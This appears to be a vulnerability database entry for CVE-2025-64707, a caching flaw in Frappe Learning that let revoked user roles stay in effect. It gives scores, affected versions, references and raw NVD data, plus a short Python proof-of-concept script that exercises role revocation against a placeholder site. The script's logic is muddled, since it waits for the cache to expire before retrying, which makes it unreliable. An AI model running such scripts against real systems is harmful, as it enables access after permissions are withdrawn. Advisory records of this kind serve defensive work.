CVE-2025-64707

Description

Frappe Learning is a learning system that helps users structure their content. Starting in version 2.0.0 and prior to version 2.41.0, when admins revoked a role from the user, the effect was not immediate because of caching. The issue has been fixed in version 2.41.0 by ensuring the cache is cleared after roles are updated.

CVSS Details

CVSS Score

5.4

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:frappe:learning:*:*:*:*:*:*:*:* - VULNERABLE

2.0.0 <= Frappe Learning < 2.41.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests import time # 步骤1：获取有效session session = requests.Session() login_url = "https://target-site.com/api/method/login" # 步骤2：使用具有权限的账户登录 session.post(login_url, json={"usr": "[email protected]", "pwd": "password"}) # 步骤3：执行特权操作 response = session.get("https://target-site.com/api/resource/ProtectedCourse") # 步骤4：模拟管理员撤销权限 admin_session = requests.Session() admin_session.post(login_url, json={"usr": "[email protected]", "pwd": "admin_password"}) admin_session.post("https://target-site.com/api/method/frappe.core.doctype.user.user.remove_role", json={"user": "[email protected]", "role": "Course Admin"}) # 步骤5：等待缓存过期后再次尝试操作 time.sleep(60) response = session.get("https://target-site.com/api/resource/ProtectedCourse")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-64707
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-64707
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-64707/
[4] VulDB https://vuldb.com/cve/CVE-2025-64707
[5] https://github.com/frappe/lms/security/advisories/GHSA-w2gf-rchw-x6vm

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-64707", "sourceIdentifier": "[email protected]", "published": "2025-11-12T23:15:40.130", "lastModified": "2025-11-17T19:20:49.227", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Frappe Learning is a learning system that helps users structure their content. Starting in version 2.0.0 and prior to version 2.41.0, when admins revoked a role from the user, the effect was not immediate because of caching. The issue has been fixed in version 2.41.0 by ensuring the cache is cleared after roles are updated."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 1.2, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "UNREPORTED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-863"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:frappe:learning:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.0.0", "versionEndExcluding": "2.41.0", "matchCriteriaId": "AFC84D34-76E4-4F11-BEA1-90F3D3C35B92"}]}]}], "references": [{"url": "https://github.com/frappe/lms/security/advisories/GHSA-w2gf-rchw-x6vm", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}